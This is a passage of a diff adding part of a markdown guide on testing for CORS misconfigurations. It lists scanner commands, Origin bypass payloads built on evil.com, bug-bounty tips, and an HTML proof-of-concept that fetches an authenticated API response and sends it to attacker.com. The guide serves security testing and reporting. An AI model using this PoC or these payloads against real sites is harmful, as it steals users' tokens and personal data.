|
172
|
+
## Automation
|
|
173
|
+
|
|
174
|
+
# Corsy — CORS misconfiguration scanner:
|
|
175
|
+
pip install corsy
|
|
176
|
+
python3 corsy.py -u https://<target>/api/ -H "Cookie: <auth>"
|
|
177
|
+
python3 corsy.py -i urls.txt
|
|
178
|
+
|
|
179
|
+
# CORStest:
|
|
180
|
+
git clone https://github.com/RUB-NDS/CORStest
|
|
181
|
+
python3 corstest.py -p -o urls.txt
|
|
182
|
+
|
|
183
|
+
# Nuclei CORS templates:
|
|
184
|
+
nuclei -t exposures/cors/ -u <target>
|
|
185
|
+
nuclei -t misconfiguration/cors-misconfig.yaml -u <target>
|
|
186
|
+
|
|
187
|
+
# Manual payloads list to try as Origin:
|
|
188
|
+
https://evil.com
|
|
189
|
+
null
|
|
190
|
+
https://<target>.evil.com
|
|
191
|
+
https://evil<target>.com
|
|
192
|
+
http://<target>
|
|
193
|
+
https://<target>%60.evil.com (backtick bypass)
|
|
194
|
+
https://<target>_.evil.com
|
|
195
|
+
|
|
196
|
+
---
|
|
197
|
+
|
|
198
|
+
## PoC Template (Steal API Response)
|
|
199
|
+
|
|
200
|
+
<!-- CORS PoC — exfiltrate authenticated API response -->
|
|
201
|
+
<html>
|
|
202
|
+
<body>
|
|
203
|
+
<script>
|
|
204
|
+
var target = 'https://<TARGET>/api/me';
|
|
205
|
+
var exfil = 'https://attacker.com/collect?d=';
|
|
206
|
+
|
|
207
|
+
fetch(target, {
|
|
208
|
+
method: 'GET',
|
|
209
|
+
credentials: 'include', // Send cookies
|
|
210
|
+
headers: {
|
|
211
|
+
'Accept': 'application/json'
|
|
212
|
+
}
|
|
213
|
+
})
|
|
214
|
+
.then(function(response) {
|
|
215
|
+
return response.text();
|
|
216
|
+
})
|
|
217
|
+
.then(function(data) {
|
|
218
|
+
// Exfiltrate the data
|
|
219
|
+
new Image().src = exfil + encodeURIComponent(data);
|
|
220
|
+
})
|
|
221
|
+
.catch(function(err) {
|
|
222
|
+
new Image().src = exfil + 'error:' + encodeURIComponent(err.toString());
|
|
223
|
+
});
|
|
224
|
+
</script>
|
|
225
|
+
</body>
|
|
226
|
+
</html>
|
|
227
|
+
|
|
228
|
+
---
|
|
229
|
+
|
|
230
|
+
## Pro Tips
|
|
231
|
+
|
|
232
|
+
1. Test EVERY API endpoint — CORS is often misconfigured on specific routes, not globally
|
|
233
|
+
2. Null origin bypass via sandboxed iframe works even with strict same-origin policies
|
|
234
|
+
3. Subdomain takeover + CORS wildcard is a very impactful chain — always enumerate subdomains
|
|
235
|
+
4. CORS `*` wildcard is NOT exploitable with credentials — only reflected/specific origins are
|
|
236
|
+
5. Test both HTTP and HTTPS origins — some servers accept protocol downgrade
|
|
237
|
+
6. Check pre-flight responses — `Access-Control-Allow-Methods: *` is also misconfiguration
|
|
238
|
+
7. Always verify CORS works end-to-end in browser before reporting — some server-side checks aren't in headers
|
|
239
|
+
|
|
240
|
+
## Summary
|
|
241
|
+
|
|
242
|
+
CORS testing = send `Origin: https://evil.com` to every authenticated API endpoint + check if `Access-Control-Allow-Origin` reflects it + check if `Access-Control-Allow-Credentials: true`. Reflected origin with credentials = critical — you can steal any authenticated response (tokens, PII, account data). Also test `Origin: null` (sandboxed iframe bypass) and `*.domain.com` patterns for subdomain takeover chains.
|